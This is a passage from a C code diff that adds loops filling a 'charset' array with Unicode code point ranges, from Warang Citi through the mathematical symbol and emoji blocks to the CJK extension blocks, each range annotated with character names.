+	while (c <= 0x118f2)	// ..to WARANG CITI NUMBER NINETY
+		charset[i++] = c++;
+	charset[i++] = 0x118ff;	// WARANG CITI OM
+// 11A00..11A4F; Zanabazar Square
+	c = 0x11a00;		// from ZANABAZAR SQUARE LETTER A
+	while (c <= 0x11a47)	// ..to ZANABAZAR SQUARE SUBJOINER
+		charset[i++] = c++;
+// 11A50..11AAF; Soyombo
+	c = 0x11a50;		// from SOYOMBO LETTER A
+	while (c <= 0x11a83)	// ..to SOYOMBO LETTER KSSA
+		charset[i++] = c++;
+	c = 0x11a86;		// from SOYOMBO CLUSTER-INITIAL LETTER RA
+	while (c <= 0x11aa2)	// ..to SOYOMBO TERMINAL MARK-2
+		charset[i++] = c++;
+// 11AC0..11AFF; Pau Cin Hau
+	c = 0x11ac0;		// from PAU CIN HAU LETTER PA
+	while (c <= 0x11af8)	// ..to PAU CIN HAU GLOTTAL STOP FINAL
+		charset[i++] = c++;
+// 11C00..11C6F; Bhaiksuki
+	c = 0x11c00;		// from BHAIKSUKI LETTER A
+	while (c <= 0x11c08)	// ..to BHAIKSUKI LETTER VOCALIC L
+		charset[i++] = c++;
+	c = 0x11c0a;		// from BHAIKSUKI LETTER E
+	while (c <= 0x11c36)	// ..to BHAIKSUKI VOWEL SIGN VOCALIC L
+		charset[i++] = c++;
+	c = 0x11c38;		// from BHAIKSUKI VOWEL SIGN E
+	while (c <= 0x11c45)	// ..to BHAIKSUKI GAP FILLER-2
+		charset[i++] = c++;
+	c = 0x11c50;		// from BHAIKSUKI DIGIT ZERO
+	while (c <= 0x11c6c)	// ..to BHAIKSUKI HUNDREDS UNIT MARK
+		charset[i++] = c++;
+// 11C70..11CBF; Marchen
+	c = 0x11c70;		// from MARCHEN HEAD MARK
+	while (c <= 0x11c8f)	// ..to MARCHEN LETTER A
+		charset[i++] = c++;
+	c = 0x11c92;		// from MARCHEN SUBJOINED LETTER KA
+	while (c <= 0x11ca7)	// ..to MARCHEN SUBJOINED LETTER ZA
+		charset[i++] = c++;
+	c = 0x11ca9;		// from MARCHEN SUBJOINED LETTER YA
+	while (c <= 0x11cb6)	// ..to MARCHEN SIGN CANDRABINDU
+		charset[i++] = c++;
+// 11D00..11D5F; Masaram Gondi
+	c = 0x11d00;		// from MASARAM GONDI LETTER A
+	while (c <= 0x11d06)	// ..to MASARAM GONDI LETTER E
+		charset[i++] = c++;
+	charset[i++] = 0x11d08;	// MASARAM GONDI LETTER AI
+	charset[i++] = 0x11d09;	// MASARAM GONDI LETTER O
+	c = 0x11d0b;		// from MASARAM GONDI LETTER AU
+	while (c <= 0x11d36)	// ..to MASARAM GONDI VOWEL SIGN VOCALIC R
+		charset[i++] = c++;
+	charset[i++] = 0x11d3c;	// MASARAM GONDI VOWEL SIGN AI
+	charset[i++] = 0x11d3d;	// MASARAM GONDI VOWEL SIGN O
+	c = 0x11d3f;		// from MASARAM GONDI VOWEL SIGN AU
+	while (c <= 0x11d47)	// ..to MASARAM GONDI RA-KARA
+		charset[i++] = c++;
+	c = 0x11d50;		// from MASARAM GONDI DIGIT ZERO
+	while (c <= 0x11d59)	// ..to MASARAM GONDI DIGIT NINE
+		charset[i++] = c++;
+// 11D60..11DAF; Gunjala Gondi
+	c = 0x11d60;		// from GUNJALA GONDI LETTER A
+	while (c <= 0x11d65)	// ..to GUNJALA GONDI LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0x11d67;	// GUNJALA GONDI LETTER EE
+	charset[i++] = 0x11d68;	// GUNJALA GONDI LETTER AI
+	c = 0x11d6a;		// from GUNJALA GONDI LETTER OO
+	while (c <= 0x11d8e)	// ..to GUNJALA GONDI VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0x11d90;	// GUNJALA GONDI VOWEL SIGN EE
+	charset[i++] = 0x11d91;	// GUNJALA GONDI VOWEL SIGN AI
+	c = 0x11d93;		// from GUNJALA GONDI VOWEL SIGN OO
+	while (c <= 0x11d98)	// ..to GUNJALA GONDI OM
+		charset[i++] = c++;
+	c = 0x11da0;		// from GUNJALA GONDI DIGIT ZERO
+	while (c <= 0x11da9)	// ..to GUNJALA GONDI DIGIT NINE
+		charset[i++] = c++;
+// 11EE0..11EFF; Makasar
+	c = 0x11ee0;		// from MAKASAR LETTER KA
+	while (c <= 0x11ef8)	// ..to MAKASAR END OF SECTION
+		charset[i++] = c++;
+// 12000..123FF; Cuneiform
+	c = 0x12000;		// from CUNEIFORM SIGN A
+	while (c <= 0x12399)	// ..to CUNEIFORM SIGN U U
+		charset[i++] = c++;
+// 12400..1247F; Cuneiform Numbers and Punctuation
+	c = 0x12400;		// from CUNEIFORM NUMERIC SIGN TWO ASH
+	while (c <= 0x1246e)	// ..to CUNEIFORM NUMERIC SIGN NINE U VARIANT FORM
+		charset[i++] = c++;
+	c = 0x12470;		// from CUNEIFORM PUNCTUATION SIGN OLD ASSYRIAN WORD DIVIDER
+	while (c <= 0x12474)	// ..to CUNEIFORM PUNCTUATION SIGN DIAGONAL QUADCOLON
+		charset[i++] = c++;
+// 12480..1254F; Early Dynastic Cuneiform
+	c = 0x12480;		// from CUNEIFORM SIGN AB TIMES NUN TENU
+	while (c <= 0x12543)	// ..to CUNEIFORM SIGN ZU5 TIMES THREE DISH TENU
+		charset[i++] = c++;
+// 13000..1342F; Egyptian Hieroglyphs
+	c = 0x13000;		// from EGYPTIAN HIEROGLYPH A001
+	while (c <= 0x1342e)	// ..to EGYPTIAN HIEROGLYPH AA032
+		charset[i++] = c++;
+// 14400..1467F; Anatolian Hieroglyphs
+	c = 0x14400;		// from ANATOLIAN HIEROGLYPH A001
+	while (c <= 0x14646)	// ..to ANATOLIAN HIEROGLYPH A530
+		charset[i++] = c++;
+// 16800..16A3F; Bamum Supplement
+	c = 0x16800;		// from BAMUM LETTER PHASE-A NGKUE MFON
+	while (c <= 0x16a38)	// ..to BAMUM LETTER PHASE-F VUEQ
+		charset[i++] = c++;
+// 16A40..16A6F; Mro
+	c = 0x16a40;		// from MRO LETTER TA
+	while (c <= 0x16a5e)	// ..to MRO LETTER TEK
+		charset[i++] = c++;
+	c = 0x16a60;		// from MRO DIGIT ZERO
+	while (c <= 0x16a69)	// ..to MRO DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x16a6e;	// MRO DANDA
+	charset[i++] = 0x16a6f;	// MRO DOUBLE DANDA
+// 16AD0..16AFF; Bassa Vah
+	c = 0x16ad0;		// from BASSA VAH LETTER ENNI
+	while (c <= 0x16aed)	// ..to BASSA VAH LETTER I
+		charset[i++] = c++;
+	c = 0x16af0;		// from BASSA VAH COMBINING HIGH TONE
+	while (c <= 0x16af5)	// ..to BASSA VAH FULL STOP
+		charset[i++] = c++;
+// 16B00..16B8F; Pahawh Hmong
+	c = 0x16b00;		// from PAHAWH HMONG VOWEL KEEB
+	while (c <= 0x16b45)	// ..to PAHAWH HMONG SIGN CIM TSOV ROG
+		charset[i++] = c++;
+	c = 0x16b50;		// from PAHAWH HMONG DIGIT ZERO
+	while (c <= 0x16b59)	// ..to PAHAWH HMONG DIGIT NINE
+		charset[i++] = c++;
+	c = 0x16b5b;		// from PAHAWH HMONG NUMBER TENS
+	while (c <= 0x16b61)	// ..to PAHAWH HMONG NUMBER TRILLIONS
+		charset[i++] = c++;
+	c = 0x16b63;		// from PAHAWH HMONG SIGN VOS LUB
+	while (c <= 0x16b77)	// ..to PAHAWH HMONG SIGN CIM NRES TOS
+		charset[i++] = c++;
+	c = 0x16b7d;		// from PAHAWH HMONG CLAN SIGN TSHEEJ
+	while (c <= 0x16b8f)	// ..to PAHAWH HMONG CLAN SIGN VWJ
+		charset[i++] = c++;
+// 16E40..16E9F; Medefaidrin
+	c = 0x16e40;		// from MEDEFAIDRIN CAPITAL LETTER M
+	while (c <= 0x16e9a)	// ..to MEDEFAIDRIN EXCLAMATION OH
+		charset[i++] = c++;
+// 16F00..16F9F; Miao
+	c = 0x16f00;		// from MIAO LETTER PA
+	while (c <= 0x16f44)	// ..to MIAO LETTER HHA
+		charset[i++] = c++;
+	c = 0x16f50;		// from MIAO LETTER NASALIZATION
+	while (c <= 0x16f7e)	// ..to MIAO VOWEL SIGN NG
+		charset[i++] = c++;
+	c = 0x16f8f;		// from MIAO TONE RIGHT
+	while (c <= 0x16f9f)	// ..to MIAO LETTER REFORMED TONE-8
+		charset[i++] = c++;
+// 16FE0..16FFF; Ideographic Symbols and Punctuation
+	charset[i++] = 0x16fe0;	// TANGUT ITERATION MARK
+	charset[i++] = 0x16fe1;	// NUSHU ITERATION MARK
+// 17000..187FF; Tangut
+	c = 0x17000;		// from <Tangut Ideograph, First>
+	while (c <= 0x187f1)	// ..to <Tangut Ideograph, Last>
+		charset[i++] = c++;
+// 18800..18AFF; Tangut Components
+	c = 0x18800;		// from TANGUT COMPONENT-001
+	while (c <= 0x18af2)	// ..to TANGUT COMPONENT-755
+		charset[i++] = c++;
+// 1B000..1B0FF; Kana Supplement
+	c = 0x1b000;		// from KATAKANA LETTER ARCHAIC E
+	while (c <= 0x1b0ff)	// ..to HENTAIGANA LETTER RE-2
+		charset[i++] = c++;
+// 1B100..1B12F; Kana Extended-A
+	c = 0x1b100;		// from HENTAIGANA LETTER RE-3
+	while (c <= 0x1b11e)	// ..to HENTAIGANA LETTER N-MU-MO-2
+		charset[i++] = c++;
+// 1B170..1B2FF; Nushu
+	c = 0x1b170;		// from NUSHU CHARACTER-1B170
+	while (c <= 0x1b2fb)	// ..to NUSHU CHARACTER-1B2FB
+		charset[i++] = c++;
+// 1BC00..1BC9F; Duployan
+	c = 0x1bc00;		// from DUPLOYAN LETTER H
+	while (c <= 0x1bc6a)	// ..to DUPLOYAN LETTER VOCALIC M
+		charset[i++] = c++;
+	c = 0x1bc70;		// from DUPLOYAN AFFIX LEFT HORIZONTAL SECANT
+	while (c <= 0x1bc7c)	// ..to DUPLOYAN AFFIX ATTACHED TANGENT HOOK
+		charset[i++] = c++;
+	c = 0x1bc80;		// from DUPLOYAN AFFIX HIGH ACUTE
+	while (c <= 0x1bc88)	// ..to DUPLOYAN AFFIX HIGH VERTICAL
+		charset[i++] = c++;
+	c = 0x1bc90;		// from DUPLOYAN AFFIX LOW ACUTE
+	while (c <= 0x1bc99)	// ..to DUPLOYAN AFFIX LOW ARROW
+		charset[i++] = c++;
+	c = 0x1bc9c;		// from DUPLOYAN SIGN O WITH CROSS
+	while (c <= 0x1bc9f)	// ..to DUPLOYAN PUNCTUATION CHINOOK FULL STOP
+		charset[i++] = c++;
+// 1BCA0..1BCAF; Shorthand Format Controls
+	c = 0x1bca0;		// from SHORTHAND FORMAT LETTER OVERLAP
+	while (c <= 0x1bca3)	// ..to SHORTHAND FORMAT UP STEP
+		charset[i++] = c++;
+// 1D000..1D0FF; Byzantine Musical Symbols
+	c = 0x1d000;		// from BYZANTINE MUSICAL SYMBOL PSILI
+	while (c <= 0x1d0f5)	// ..to BYZANTINE MUSICAL SYMBOL GORGON NEO KATO
+		charset[i++] = c++;
+// 1D100..1D1FF; Musical Symbols
+	c = 0x1d100;		// from MUSICAL SYMBOL SINGLE BARLINE
+	while (c <= 0x1d126)	// ..to MUSICAL SYMBOL DRUM CLEF-2
+		charset[i++] = c++;
+	c = 0x1d129;		// from MUSICAL SYMBOL MULTIPLE MEASURE REST
+	while (c <= 0x1d1e8)	// ..to MUSICAL SYMBOL KIEVAN FLAT SIGN
+		charset[i++] = c++;
+// 1D200..1D24F; Ancient Greek Musical Notation
+	c = 0x1d200;		// from GREEK VOCAL NOTATION SYMBOL-1
+	while (c <= 0x1d245)	// ..to GREEK MUSICAL LEIMMA
+		charset[i++] = c++;
+// 1D2E0..1D2FF; Mayan Numerals
+	c = 0x1d2e0;		// from MAYAN NUMERAL ZERO
+	while (c <= 0x1d2f3)	// ..to MAYAN NUMERAL NINETEEN
+		charset[i++] = c++;
+// 1D300..1D35F; Tai Xuan Jing Symbols
+	c = 0x1d300;		// from MONOGRAM FOR EARTH
+	while (c <= 0x1d356)	// ..to TETRAGRAM FOR FOSTERING
+		charset[i++] = c++;
+// 1D360..1D37F; Counting Rod Numerals
+	c = 0x1d360;		// from COUNTING ROD UNIT DIGIT ONE
+	while (c <= 0x1d378)	// ..to TALLY MARK FIVE
+		charset[i++] = c++;
+// 1D400..1D7FF; Mathematical Alphanumeric Symbols
+	c = 0x1d400;		// from MATHEMATICAL BOLD CAPITAL A
+	while (c <= 0x1d454)	// ..to MATHEMATICAL ITALIC SMALL G
+		charset[i++] = c++;
+	c = 0x1d456;		// from MATHEMATICAL ITALIC SMALL I
+	while (c <= 0x1d49c)	// ..to MATHEMATICAL SCRIPT CAPITAL A
+		charset[i++] = c++;
+	charset[i++] = 0x1d49e;	// MATHEMATICAL SCRIPT CAPITAL C
+	charset[i++] = 0x1d49f;	// MATHEMATICAL SCRIPT CAPITAL D
+	charset[i++] = 0x1d4a5;	// MATHEMATICAL SCRIPT CAPITAL J
+	charset[i++] = 0x1d4a6;	// MATHEMATICAL SCRIPT CAPITAL K
+	c = 0x1d4a9;		// from MATHEMATICAL SCRIPT CAPITAL N
+	while (c <= 0x1d4ac)	// ..to MATHEMATICAL SCRIPT CAPITAL Q
+		charset[i++] = c++;
+	c = 0x1d4ae;		// from MATHEMATICAL SCRIPT CAPITAL S
+	while (c <= 0x1d4b9)	// ..to MATHEMATICAL SCRIPT SMALL D
+		charset[i++] = c++;
+	c = 0x1d4bd;		// from MATHEMATICAL SCRIPT SMALL H
+	while (c <= 0x1d4c3)	// ..to MATHEMATICAL SCRIPT SMALL N
+		charset[i++] = c++;
+	c = 0x1d4c5;		// from MATHEMATICAL SCRIPT SMALL P
+	while (c <= 0x1d505)	// ..to MATHEMATICAL FRAKTUR CAPITAL B
+		charset[i++] = c++;
+	c = 0x1d507;		// from MATHEMATICAL FRAKTUR CAPITAL D
+	while (c <= 0x1d50a)	// ..to MATHEMATICAL FRAKTUR CAPITAL G
+		charset[i++] = c++;
+	c = 0x1d50d;		// from MATHEMATICAL FRAKTUR CAPITAL J
+	while (c <= 0x1d514)	// ..to MATHEMATICAL FRAKTUR CAPITAL Q
+		charset[i++] = c++;
+	c = 0x1d516;		// from MATHEMATICAL FRAKTUR CAPITAL S
+	while (c <= 0x1d51c)	// ..to MATHEMATICAL FRAKTUR CAPITAL Y
+		charset[i++] = c++;
+	c = 0x1d51e;		// from MATHEMATICAL FRAKTUR SMALL A
+	while (c <= 0x1d539)	// ..to MATHEMATICAL DOUBLE-STRUCK CAPITAL B
+		charset[i++] = c++;
+	c = 0x1d53b;		// from MATHEMATICAL DOUBLE-STRUCK CAPITAL D
+	while (c <= 0x1d53e)	// ..to MATHEMATICAL DOUBLE-STRUCK CAPITAL G
+		charset[i++] = c++;
+	c = 0x1d540;		// from MATHEMATICAL DOUBLE-STRUCK CAPITAL I
+	while (c <= 0x1d544)	// ..to MATHEMATICAL DOUBLE-STRUCK CAPITAL M
+		charset[i++] = c++;
+	c = 0x1d54a;		// from MATHEMATICAL DOUBLE-STRUCK CAPITAL S
+	while (c <= 0x1d550)	// ..to MATHEMATICAL DOUBLE-STRUCK CAPITAL Y
+		charset[i++] = c++;
+	c = 0x1d552;		// from MATHEMATICAL DOUBLE-STRUCK SMALL A
+	while (c <= 0x1d6a5)	// ..to MATHEMATICAL ITALIC SMALL DOTLESS J
+		charset[i++] = c++;
+	c = 0x1d6a8;		// from MATHEMATICAL BOLD CAPITAL ALPHA
+	while (c <= 0x1d7cb)	// ..to MATHEMATICAL BOLD SMALL DIGAMMA
+		charset[i++] = c++;
+	c = 0x1d7ce;		// from MATHEMATICAL BOLD DIGIT ZERO
+	while (c <= 0x1d7ff)	// ..to MATHEMATICAL MONOSPACE DIGIT NINE
+		charset[i++] = c++;
+// 1D800..1DAAF; Sutton SignWriting
+	c = 0x1d800;		// from SIGNWRITING HAND-FIST INDEX
+	while (c <= 0x1da8b)	// ..to SIGNWRITING PARENTHESIS
+		charset[i++] = c++;
+	c = 0x1da9b;		// from SIGNWRITING FILL MODIFIER-2
+	while (c <= 0x1da9f)	// ..to SIGNWRITING FILL MODIFIER-6
+		charset[i++] = c++;
+	c = 0x1daa1;		// from SIGNWRITING ROTATION MODIFIER-2
+	while (c <= 0x1daaf)	// ..to SIGNWRITING ROTATION MODIFIER-16
+		charset[i++] = c++;
+// 1E000..1E02F; Glagolitic Supplement
+	c = 0x1e000;		// from COMBINING GLAGOLITIC LETTER AZU
+	while (c <= 0x1e006)	// ..to COMBINING GLAGOLITIC LETTER ZHIVETE
+		charset[i++] = c++;
+	c = 0x1e008;		// from COMBINING GLAGOLITIC LETTER ZEMLJA
+	while (c <= 0x1e018)	// ..to COMBINING GLAGOLITIC LETTER HERU
+		charset[i++] = c++;
+	c = 0x1e01b;		// from COMBINING GLAGOLITIC LETTER SHTA
+	while (c <= 0x1e021)	// ..to COMBINING GLAGOLITIC LETTER YATI
+		charset[i++] = c++;
+	charset[i++] = 0x1e023;	// COMBINING GLAGOLITIC LETTER YU
+	charset[i++] = 0x1e024;	// COMBINING GLAGOLITIC LETTER SMALL YUS
+	c = 0x1e026;		// from COMBINING GLAGOLITIC LETTER YO
+	while (c <= 0x1e02a)	// ..to COMBINING GLAGOLITIC LETTER FITA
+		charset[i++] = c++;
+// 1E800..1E8DF; Mende Kikakui
+	c = 0x1e800;		// from MENDE KIKAKUI SYLLABLE M001 KI
+	while (c <= 0x1e8c4)	// ..to MENDE KIKAKUI SYLLABLE M060 NYON
+		charset[i++] = c++;
+	c = 0x1e8c7;		// from MENDE KIKAKUI DIGIT ONE
+	while (c <= 0x1e8d6)	// ..to MENDE KIKAKUI COMBINING NUMBER MILLIONS
+		charset[i++] = c++;
+// 1E900..1E95F; Adlam
+	c = 0x1e900;		// from ADLAM CAPITAL LETTER ALIF
+	while (c <= 0x1e94a)	// ..to ADLAM NUKTA
+		charset[i++] = c++;
+	c = 0x1e950;		// from ADLAM DIGIT ZERO
+	while (c <= 0x1e959)	// ..to ADLAM DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1e95e;	// ADLAM INITIAL EXCLAMATION MARK
+	charset[i++] = 0x1e95f;	// ADLAM INITIAL QUESTION MARK
+// 1EC70..1ECBF; Indic Siyaq Numbers
+	c = 0x1ec71;		// from INDIC SIYAQ NUMBER ONE
+	while (c <= 0x1ecb4)	// ..to INDIC SIYAQ ALTERNATE LAKH MARK
+		charset[i++] = c++;
+// 1EE00..1EEFF; Arabic Mathematical Alphabetic Symbols
+	c = 0x1ee00;		// from ARABIC MATHEMATICAL ALEF
+	while (c <= 0x1ee03)	// ..to ARABIC MATHEMATICAL DAL
+		charset[i++] = c++;
+	c = 0x1ee05;		// from ARABIC MATHEMATICAL WAW
+	while (c <= 0x1ee1f)	// ..to ARABIC MATHEMATICAL DOTLESS QAF
+		charset[i++] = c++;
+	charset[i++] = 0x1ee21;	// ARABIC MATHEMATICAL INITIAL BEH
+	charset[i++] = 0x1ee22;	// ARABIC MATHEMATICAL INITIAL JEEM
+	c = 0x1ee29;		// from ARABIC MATHEMATICAL INITIAL YEH
+	while (c <= 0x1ee32)	// ..to ARABIC MATHEMATICAL INITIAL QAF
+		charset[i++] = c++;
+	c = 0x1ee34;		// from ARABIC MATHEMATICAL INITIAL SHEEN
+	while (c <= 0x1ee37)	// ..to ARABIC MATHEMATICAL INITIAL KHAH
+		charset[i++] = c++;
+	charset[i++] = 0x1ee4d;	// ARABIC MATHEMATICAL TAILED NOON
+	charset[i++] = 0x1ee4f;	// ARABIC MATHEMATICAL TAILED AIN
+	charset[i++] = 0x1ee51;	// ARABIC MATHEMATICAL TAILED SAD
+	charset[i++] = 0x1ee52;	// ARABIC MATHEMATICAL TAILED QAF
+	charset[i++] = 0x1ee61;	// ARABIC MATHEMATICAL STRETCHED BEH
+	charset[i++] = 0x1ee62;	// ARABIC MATHEMATICAL STRETCHED JEEM
+	c = 0x1ee67;		// from ARABIC MATHEMATICAL STRETCHED HAH
+	while (c <= 0x1ee6a)	// ..to ARABIC MATHEMATICAL STRETCHED KAF
+		charset[i++] = c++;
+	c = 0x1ee6c;		// from ARABIC MATHEMATICAL STRETCHED MEEM
+	while (c <= 0x1ee72)	// ..to ARABIC MATHEMATICAL STRETCHED QAF
+		charset[i++] = c++;
+	c = 0x1ee74;		// from ARABIC MATHEMATICAL STRETCHED SHEEN
+	while (c <= 0x1ee77)	// ..to ARABIC MATHEMATICAL STRETCHED KHAH
+		charset[i++] = c++;
+	c = 0x1ee79;		// from ARABIC MATHEMATICAL STRETCHED DAD
+	while (c <= 0x1ee7c)	// ..to ARABIC MATHEMATICAL STRETCHED DOTLESS BEH
+		charset[i++] = c++;
+	c = 0x1ee80;		// from ARABIC MATHEMATICAL LOOPED ALEF
+	while (c <= 0x1ee89)	// ..to ARABIC MATHEMATICAL LOOPED YEH
+		charset[i++] = c++;
+	c = 0x1ee8b;		// from ARABIC MATHEMATICAL LOOPED LAM
+	while (c <= 0x1ee9b)	// ..to ARABIC MATHEMATICAL LOOPED GHAIN
+		charset[i++] = c++;
+	charset[i++] = 0x1eea1;	// ARABIC MATHEMATICAL DOUBLE-STRUCK BEH
+	charset[i++] = 0x1eea3;	// ARABIC MATHEMATICAL DOUBLE-STRUCK DAL
+	c = 0x1eea5;		// from ARABIC MATHEMATICAL DOUBLE-STRUCK WAW
+	while (c <= 0x1eea9)	// ..to ARABIC MATHEMATICAL DOUBLE-STRUCK YEH
+		charset[i++] = c++;
+	c = 0x1eeab;		// from ARABIC MATHEMATICAL DOUBLE-STRUCK LAM
+	while (c <= 0x1eebb)	// ..to ARABIC MATHEMATICAL DOUBLE-STRUCK GHAIN
+		charset[i++] = c++;
+	charset[i++] = 0x1eef0;	// ARABIC MATHEMATICAL OPERATOR MEEM WITH HAH WITH TATWEEL
+	charset[i++] = 0x1eef1;	// ARABIC MATHEMATICAL OPERATOR HAH WITH DAL
+// 1F000..1F02F; Mahjong Tiles
+	c = 0x1f000;		// from MAHJONG TILE EAST WIND
+	while (c <= 0x1f02b)	// ..to MAHJONG TILE BACK
+		charset[i++] = c++;
+// 1F030..1F09F; Domino Tiles
+	c = 0x1f030;		// from DOMINO TILE HORIZONTAL BACK
+	while (c <= 0x1f093)	// ..to DOMINO TILE VERTICAL-06-06
+		charset[i++] = c++;
+// 1F0A0..1F0FF; Playing Cards
+	c = 0x1f0a0;		// from PLAYING CARD BACK
+	while (c <= 0x1f0ae)	// ..to PLAYING CARD KING OF SPADES
+		charset[i++] = c++;
+	c = 0x1f0b1;		// from PLAYING CARD ACE OF HEARTS
+	while (c <= 0x1f0bf)	// ..to PLAYING CARD RED JOKER
+		charset[i++] = c++;
+	c = 0x1f0c1;		// from PLAYING CARD ACE OF DIAMONDS
+	while (c <= 0x1f0cf)	// ..to PLAYING CARD BLACK JOKER
+		charset[i++] = c++;
+	c = 0x1f0d1;		// from PLAYING CARD ACE OF CLUBS
+	while (c <= 0x1f0f5)	// ..to PLAYING CARD TRUMP-21
+		charset[i++] = c++;
+// 1F100..1F1FF; Enclosed Alphanumeric Supplement
+	c = 0x1f100;		// from DIGIT ZERO FULL STOP
+	while (c <= 0x1f10c)	// ..to DINGBAT NEGATIVE CIRCLED SANS-SERIF DIGIT ZERO
+		charset[i++] = c++;
+	c = 0x1f110;		// from PARENTHESIZED LATIN CAPITAL LETTER A
+	while (c <= 0x1f16b)	// ..to RAISED MD SIGN
+		charset[i++] = c++;
+	c = 0x1f170;		// from NEGATIVE SQUARED LATIN CAPITAL LETTER A
+	while (c <= 0x1f1ac)	// ..to SQUARED VOD
+		charset[i++] = c++;
+	c = 0x1f1e6;		// from REGIONAL INDICATOR SYMBOL LETTER A
+	while (c <= 0x1f1ff)	// ..to REGIONAL INDICATOR SYMBOL LETTER Z
+		charset[i++] = c++;
+// 1F200..1F2FF; Enclosed Ideographic Supplement
+	charset[i++] = 0x1f200;	// SQUARE HIRAGANA HOKA
+	charset[i++] = 0x1f202;	// SQUARED KATAKANA SA
+	c = 0x1f210;		// from SQUARED CJK UNIFIED IDEOGRAPH-624B
+	while (c <= 0x1f23b)	// ..to SQUARED CJK UNIFIED IDEOGRAPH-914D
+		charset[i++] = c++;
+	c = 0x1f240;		// from TORTOISE SHELL BRACKETED CJK UNIFIED IDEOGRAPH-672C
+	while (c <= 0x1f248)	// ..to TORTOISE SHELL BRACKETED CJK UNIFIED IDEOGRAPH-6557
+		charset[i++] = c++;
+	charset[i++] = 0x1f250;	// CIRCLED IDEOGRAPH ADVANTAGE
+	charset[i++] = 0x1f251;	// CIRCLED IDEOGRAPH ACCEPT
+	c = 0x1f260;		// from ROUNDED SYMBOL FOR FU
+	while (c <= 0x1f265)	// ..to ROUNDED SYMBOL FOR CAI
+		charset[i++] = c++;
+// 1F300..1F5FF; Miscellaneous Symbols and Pictographs
+	c = 0x1f300;		// from CYCLONE
+	while (c <= 0x1f5ff)	// ..to MOYAI
+		charset[i++] = c++;
+// 1F600..1F64F; Emoticons
+	c = 0x1f600;		// from GRINNING FACE
+	while (c <= 0x1f64f)	// ..to PERSON WITH FOLDED HANDS
+		charset[i++] = c++;
+// 1F650..1F67F; Ornamental Dingbats
+	c = 0x1f650;		// from NORTH WEST POINTING LEAF
+	while (c <= 0x1f67f)	// ..to REVERSE CHECKER BOARD
+		charset[i++] = c++;
+// 1F680..1F6FF; Transport and Map Symbols
+	c = 0x1f680;		// from ROCKET
+	while (c <= 0x1f6d4)	// ..to PAGODA
+		charset[i++] = c++;
+	c = 0x1f6e0;		// from HAMMER AND WRENCH
+	while (c <= 0x1f6ec)	// ..to AIRPLANE ARRIVING
+		charset[i++] = c++;
+	c = 0x1f6f0;		// from SATELLITE
+	while (c <= 0x1f6f9)	// ..to SKATEBOARD
+		charset[i++] = c++;
+// 1F700..1F77F; Alchemical Symbols
+	c = 0x1f700;		// from ALCHEMICAL SYMBOL FOR QUINTESSENCE
+	while (c <= 0x1f773)	// ..to ALCHEMICAL SYMBOL FOR HALF OUNCE
+		charset[i++] = c++;
+// 1F780..1F7FF; Geometric Shapes Extended
+	c = 0x1f780;		// from BLACK LEFT-POINTING ISOSCELES RIGHT TRIANGLE
+	while (c <= 0x1f7d8)	// ..to NEGATIVE CIRCLED SQUARE
+		charset[i++] = c++;
+// 1F800..1F8FF; Supplemental Arrows-C
+	c = 0x1f800;		// from LEFTWARDS ARROW WITH SMALL TRIANGLE ARROWHEAD
+	while (c <= 0x1f80b)	// ..to DOWNWARDS ARROW WITH LARGE TRIANGLE ARROWHEAD
+		charset[i++] = c++;
+	c = 0x1f810;		// from LEFTWARDS ARROW WITH SMALL EQUILATERAL ARROWHEAD
+	while (c <= 0x1f847)	// ..to DOWNWARDS HEAVY ARROW
+		charset[i++] = c++;
+	c = 0x1f850;		// from LEFTWARDS SANS-SERIF ARROW
+	while (c <= 0x1f859)	// ..to UP DOWN SANS-SERIF ARROW
+		charset[i++] = c++;
+	c = 0x1f860;		// from WIDE-HEADED LEFTWARDS LIGHT BARB ARROW
+	while (c <= 0x1f887)	// ..to WIDE-HEADED SOUTH WEST VERY HEAVY BARB ARROW
+		charset[i++] = c++;
+	c = 0x1f890;		// from LEFTWARDS TRIANGLE ARROWHEAD
+	while (c <= 0x1f8ad)	// ..to WHITE ARROW SHAFT WIDTH TWO THIRDS
+		charset[i++] = c++;
+// 1F900..1F9FF; Supplemental Symbols and Pictographs
+	c = 0x1f900;		// from CIRCLED CROSS FORMEE WITH FOUR DOTS
+	while (c <= 0x1f90b)	// ..to DOWNWARD FACING NOTCHED HOOK WITH DOT
+		charset[i++] = c++;
+	c = 0x1f910;		// from ZIPPER-MOUTH FACE
+	while (c <= 0x1f93e)	// ..to HANDBALL
+		charset[i++] = c++;
+	c = 0x1f940;		// from WILTED FLOWER
+	while (c <= 0x1f970)	// ..to SMILING FACE WITH SMILING EYES AND THREE HEARTS
+		charset[i++] = c++;
+	c = 0x1f973;		// from FACE WITH PARTY HORN AND PARTY HAT
+	while (c <= 0x1f976)	// ..to FREEZING FACE
+		charset[i++] = c++;
+	c = 0x1f97c;		// from LAB COAT
+	while (c <= 0x1f9a2)	// ..to SWAN
+		charset[i++] = c++;
+	c = 0x1f9b0;		// from EMOJI COMPONENT RED HAIR
+	while (c <= 0x1f9b9)	// ..to SUPERVILLAIN
+		charset[i++] = c++;
+	charset[i++] = 0x1f9c0;	// CHEESE WEDGE
+	charset[i++] = 0x1f9c2;	// SALT SHAKER
+	c = 0x1f9d0;		// from FACE WITH MONOCLE
+	while (c <= 0x1f9ff)	// ..to NAZAR AMULET
+		charset[i++] = c++;
+// 1FA00..1FA6F; Chess Symbols
+	c = 0x1fa60;		// from XIANGQI RED GENERAL
+	while (c <= 0x1fa6d)	// ..to XIANGQI BLACK SOLDIER
+		charset[i++] = c++;
+// 20000..2A6DF; CJK Unified Ideographs Extension B
+	c = 0x20000;		// from <CJK Ideograph Extension B, First>
+	while (c <= 0x2a6d6)	// ..to <CJK Ideograph Extension B, Last>
+		charset[i++] = c++;
+// 2A700..2B73F; CJK Unified Ideographs Extension C
+	c = 0x2a700;		// from <CJK Ideograph Extension C, First>
+	while (c <= 0x2b734)	// ..to <CJK Ideograph Extension C, Last>
+		charset[i++] = c++;
+// 2B740..2B81F; CJK Unified Ideographs Extension D
+	c = 0x2b740;		// from <CJK Ideograph Extension D, First>
+	while (c <= 0x2b81d)	// ..to <CJK Ideograph Extension D, Last>
+		charset[i++] = c++;
+// 2B820..2CEAF; CJK Unified Ideographs Extension E
+	c = 0x2b820;		// from <CJK Ideograph Extension E, First>
+	while (c <= 0x2cea1)	// ..to <CJK Ideograph Extension E, Last>
+		charset[i++] = c++;
+// 2CEB0..2EBEF; CJK Unified Ideographs Extension F
